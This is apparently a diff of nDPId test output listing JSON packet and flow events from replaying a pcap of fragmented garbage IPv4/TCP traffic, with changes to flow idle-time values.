00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8763,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkAhQCMkJV4mKigpKComXiU="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032911} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8764,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiQjQCMkJV4m"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8765,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiooKiZeJSQjJiooS0lKSEc0yAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8766,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZEMiomREZHSEpLJl4lJCM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8767,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244033211} @@ -18154,64 +18154,64 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":9076,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244033215} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244033211,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmxrZGE+TDxN"} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 